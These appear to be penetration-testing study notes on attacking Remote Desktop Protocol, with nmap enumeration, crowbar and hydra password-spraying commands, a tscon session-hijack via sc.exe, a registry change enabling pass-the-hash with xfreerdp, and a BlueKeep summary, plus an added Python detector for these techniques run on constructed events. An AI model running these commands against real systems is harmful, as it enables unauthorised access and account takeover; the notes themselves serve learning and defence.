5.rdp
I. RDP Basics
Function: Provides a graphical interface for remote computer access.
Port: TCP/3389.
Use Cases: System administration, managed service providers (MSPs).
Attack Vectors:
Misconfigurations (weak/no passwords).
Password guessing/spraying.
Session hijacking.
Pass-the-Hash (PtH).
Exploiting vulnerabilities (e.g., BlueKeep).
II. Enumeration
Nmap:
nmap -Pn -p3389 <target_IP>
III. Misconfigurations & Password Attacks
Password Spraying:
crowbar -b rdp -s <target_IP>/32 -U <user_list> -c <password>
hydra -L <user_list> -p <password> <target_IP> rdp
RDP Login:
rdesktop -u <user> -p <password> <target_IP>
xfreerdp /v:<target_IP> /u:<user> /p:<password>
IV. Protocol-Specific Attacks
RDP Session Hijacking:
query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_ID> /dest:rdp-tcp#<our_session_ID>"
net start sessionhijack
RDP Pass-the-Hash (PtH):
Enable Restricted Admin Mode (registry key):
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Authenticate using NT Hash:
xfreerdp /v:<target_IP> /u:<user> /pth:<NT_hash>
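Detection logic for the three techniques above (password spraying, the sc.exe/tscon session hijack, and the DisableRestrictedAdmin toggle that precedes PtH), added here as an example; it is not part of the original notes. The event lines are constructed, and the pipe-separated format is an assumption standing in for Windows Security event 4625 (failed logon), System event 7045 (service installed) and Security event 4657 (registry value modified).

```python
from collections import defaultdict

# Constructed sample log lines (not captured from a real host).
# Simplified form: "<EventID>|field=value|field=value|..."
SAMPLE_EVENTS = [
    "4625|src=10.0.0.5|user=alice|logon_type=10",
    "4625|src=10.0.0.5|user=bob|logon_type=10",
    "4625|src=10.0.0.5|user=carol|logon_type=10",
    "4625|src=10.0.0.5|user=dave|logon_type=10",
    "4625|src=10.0.0.9|user=alice|logon_type=10",
    "4625|src=10.0.0.9|user=alice|logon_type=10",
    "7045|host=WS01|service=sessionhijack|image=cmd.exe /k tscon 3 /dest:rdp-tcp#2",
    "7045|host=WS01|service=Backup|image=C:\\Tools\\backup.exe",
    "4657|host=WS01|key=HKLM\\System\\CurrentControlSet\\Control\\Lsa|value=DisableRestrictedAdmin|new=0",
]

def parse(line):
    """Turn one constructed line into a dict keyed by field name."""
    event_id, *fields = line.split("|")
    rec = {"id": event_id}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec

def detect_spray(events, threshold=3):
    """Sources with failed RDP logons (logon type 10) against at least
    `threshold` distinct accounts: the one-password-many-users pattern
    that crowbar/hydra spraying produces."""
    users = defaultdict(set)
    for e in events:
        if e["id"] == "4625" and e.get("logon_type") == "10":
            users[e["src"]].add(e["user"])
    return sorted(src for src, u in users.items() if len(u) >= threshold)

def detect_tscon_service(events):
    """Newly installed services whose image path invokes tscon: the trace
    the sc.exe/tscon hijack leaves in System event 7045."""
    return [e["service"] for e in events
            if e["id"] == "7045" and "tscon" in e.get("image", "").lower()]

def detect_restricted_admin_toggle(events):
    """DisableRestrictedAdmin set to 0 enables Restricted Admin mode, the
    precondition for xfreerdp /pth; needs object auditing on the Lsa key."""
    return [e["host"] for e in events
            if e["id"] == "4657" and e.get("value") == "DisableRestrictedAdmin"
            and e.get("new") == "0"]

if __name__ == "__main__":
    evs = [parse(line) for line in SAMPLE_EVENTS]
    print("spraying sources:", detect_spray(evs))
    print("tscon services:", detect_tscon_service(evs))
    print("restricted admin enabled on:", detect_restricted_admin_toggle(evs))
```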
V. Latest RDP Vulnerabilities
CVE-2019-0708 (BlueKeep):
RCE vulnerability.
Root cause: Use-After-Free (UAF).
Triggered by manipulated initialization requests.
Impacts older Windows versions.
Exploitation can cause system instability (BSoD).
Key Commands Summary
Nmap:
nmap -Pn -p3389 <target_IP>
Crowbar:
crowbar -b rdp -s <target_IP>/32 -U <user_list> -c <password>
Hydra:
hydra -L <user_list> -p <password> <target_IP> rdp
rdesktop:
rdesktop -u <user> -p <password> <target_IP>
xfreerdp:
xfreerdp /v:<target_IP> /u:<user> /p:<password>
xfreerdp /v:<target_IP> /u:<user> /pth:<NT_hash>
Windows Commands:
query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <target_session_ID> /dest:rdp-tcp#<our_session_ID>"
net start sessionhijack
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f